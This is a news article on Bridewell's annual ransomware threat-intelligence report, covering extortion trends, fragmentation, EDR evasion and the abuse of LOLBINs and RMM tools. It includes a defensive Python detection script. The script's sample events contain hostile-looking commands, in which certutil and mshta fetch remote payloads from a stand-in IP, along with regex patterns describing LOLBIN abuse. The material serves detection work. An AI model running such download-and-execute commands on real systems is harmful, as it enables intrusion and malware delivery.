Bridewell, a UK-based cybersecurity services company, has released its latest CTI Annual Report which includes intelligence on ransomware trends, highlighting significant shifts in attack strategies, payment dynamics and threat actor behaviours. The analysis reveals that data theft and extortion have overtaken traditional encryption-only ransomware as the most successful approach for attackers. While encryption-based attacks tend to result in larger individual ransom payments, often due to the urgency of restoring critical services, data theft and extortion cases are more likely to result in a payment, with attackers leveraging the fear of regulatory penalties and reputational damage to pressure victims into compliance.
At the same time, ransomware payments overall have continued to decline year-on-year. Bridewell attributes this to stricter regulations, greater law enforcement coordination and increasing sanctions on cybercriminal entities. Organisations considering payment must now conduct rigorous due diligence to avoid inadvertently transacting with sanctioned groups or Ransomware-as-a-Service (RaaS) operations.
The key findings are as follows:
Vulnerability exploitation on the rise
Bridewell has observed that groups such as Clop and Termite have become highly proficient at exploiting Internet-facing systems and edge devices, including Fortinet and Ivanti appliances among others. Exploiting unpatched vulnerabilities in these perimeter products remains a primary initial access vector: a single exploitable flaw in a widely deployed appliance lets a threat actor compromise many victims at scale and drive larger financial outcomes.
Fragmentation and lone wolves
The ransomware ecosystem is becoming increasingly fragmented. Bridewell threat intelligence links this to both infighting within groups and persistent law enforcement takedowns, which have led to the splintering of major groups such as Conti and AlphV/BlackCat. This has resulted in a broader and more diverse pool of active ransomware actors, making the threat landscape more volatile and difficult to defend against.
Compounding this issue is the rise of lone-wolf actors: individual affiliates or cybercriminals operating independently of any established group. These actors often rely on leaked RaaS source code or publicly available tooling to mount ransomware operations on their own. The trend is partly driven by a lack of trust in larger operations because of the risk of exit scams, in which affiliates are denied their share of ransom proceeds.
Tactical shifts in tooling and techniques
Bridewell continues to observe ransomware actors targeting VMware ESXi environments, aiming to cripple core virtualised infrastructure quickly. Groups like VanHelsing and DragonForce are actively pursuing this tactic in ongoing campaigns.
Meanwhile, adversaries are developing or acquiring capabilities to evade Endpoint Detection and Response (EDR) systems, often by loading vulnerable signed drivers (the bring-your-own-vulnerable-driver technique) or by abusing native operating-system features. The use of Living-Off-the-Land Binaries (LOLBINs) and legitimate Remote Monitoring and Management (RMM) tools has become widespread, enabling attackers to blend in with administrative activity and maintain persistent access without deploying traditional malware.
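Because LOLBINs and RMM tools are legitimate, signed binaries, detection has to key on how and from where they run rather than on the binary itself. The following is an added example, not code from the Bridewell report: it triages a handful of constructed process-creation records (Sysmon Event ID 1 style fields) and flags LOLBINs invoked with known abuse patterns, RMM tools the organisation has not sanctioned, and sanctioned RMM tools launched from user-writable directories. The LOLBIN rules, the RMM tool names, the sanctioned-tool allowlist and the sample events are all assumptions a defender would tune to their own environment.

```python
"""Triage process-creation events for LOLBIN and RMM-tool abuse.

Added example; the rules and sample data are constructed, not taken
from the Bridewell report or from real telemetry.
"""
import re
from dataclasses import dataclass

# Constructed process-creation records (Sysmon Event ID 1 field names).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.7/a.txt C:\Users\Public\a.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verify C:\certs\server.cer",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\AnyDesk.exe",
     "CommandLine": r'"C:\Users\bob\AppData\Local\Temp\AnyDesk.exe" --silent',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Program Files\TeamViewer\TeamViewer.exe",
     "CommandLine": r'"C:\Program Files\TeamViewer\TeamViewer.exe"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Users\bob\AppData\Roaming\TeamViewer.exe",
     "CommandLine": r'"C:\Users\bob\AppData\Roaming\TeamViewer.exe"',
     "ParentImage": r"C:\Windows\System32\rundll32.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe http://203.0.113.7/x.hta",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]

# LOLBINs paired with command-line patterns that indicate abuse rather
# than routine administrative use. Assumed starting set; extend it from
# a reference catalogue such as LOLBAS for production use.
LOLBIN_RULES = {
    "certutil.exe": re.compile(r"-urlcache|-decode|-encode", re.I),
    "mshta.exe": re.compile(r"https?://|javascript:|vbscript:", re.I),
    "rundll32.exe": re.compile(r"javascript:|\burl\.dll\b", re.I),
    "regsvr32.exe": re.compile(r"/i:\S*https?://|scrobj\.dll", re.I),
}

# RMM agents that may appear on endpoints (assumed) and the single one
# this hypothetical organisation actually sanctions.
RMM_TOOLS = {"anydesk.exe", "teamviewer.exe", "screenconnect.client.exe",
             "atera.exe", "splashtopstreamer.exe"}
SANCTIONED_RMM = {"teamviewer.exe"}

# Paths a properly installed agent would not normally execute from.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(AppData|Downloads)\\|\\Temp\\|\\Users\\Public\\", re.I)


@dataclass(frozen=True)
class Finding:
    index: int     # position of the offending event in the input list
    image: str     # lower-cased executable name
    reason: str    # why the event was flagged


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(events: list[dict]) -> list[Finding]:
    """Return one Finding per event that matches a LOLBIN or RMM rule."""
    findings = []
    for i, ev in enumerate(events):
        name = basename(ev["Image"])
        cmd = ev.get("CommandLine", "")
        rule = LOLBIN_RULES.get(name)
        if rule and rule.search(cmd):
            findings.append(Finding(i, name, "lolbin abuse pattern in command line"))
            continue
        if name in RMM_TOOLS:
            if name not in SANCTIONED_RMM:
                findings.append(Finding(i, name, "unsanctioned RMM tool"))
            elif USER_WRITABLE.search(ev["Image"]):
                # The right tool in the wrong place: an attacker-dropped copy.
                findings.append(Finding(i, name,
                                        "sanctioned RMM tool running from user-writable path"))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"event {f.index}: {f.image}: {f.reason}")
```

Run as a script it flags events 0, 2, 4 and 5 and stays silent on the routine certutil -verify call and the TeamViewer instance running from Program Files. The third rule matters in practice: a sanctioned RMM tool can still be attacker-controlled when a second copy is dropped into AppData or Temp, which an allowlist on the file name alone would wave through.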
Despite efforts to disrupt its use, Cobalt Strike remains the offensive security tool most widely used by ransomware operators, closely followed by Metasploit, Sliver and Brute Ratel, and more recently by Pyramid C2, a Python-based command and control (C2) framework.
Shift to data theft-only operations
Bridewell has also observed the continued evolution of data-theft-only ransomware operations, which bypass encryption altogether. This approach is especially effective in today’s increasingly regulated privacy landscape, where organisations fear substantial fines and long-term brand damage. Attackers are now refining their extortion tactics to exploit this pressure more effectively.
Remote access and patch management still a weak link
Bridewell’s insights, aligned with Q1 2025 data from Coveware, show that remote access solutions (VPNs and RMM tools) and unpatched software vulnerabilities remain the leading intrusion vectors. Although phishing incidents appear to be decreasing, phishing is likely now being used indirectly: initial access brokers harvest credentials and sell them on to ransomware affiliates, so the phishing step no longer shows up in the ransomware case itself.
“We’re seeing a clear shift in ransomware tactics. Encryption-only attacks are proving less effective, while data theft and extortion are leading to more successful payment outcomes. At the same time, organisations are increasingly hesitant to pay ransoms due to growing regulatory pressure and the risk of violating sanctions,” said Gavin Knapp, Cyber Threat Intelligence Principal Lead, Bridewell. “Our goal with this report is to provide actionable insights that help organisations strengthen their defences and build greater resilience against cyber attacks. Staying ahead of persistent and evolving threat actors is no easy task, but understanding and mitigating the risks posed by adversarial infrastructure must remain a core component of any robust cybersecurity strategy.”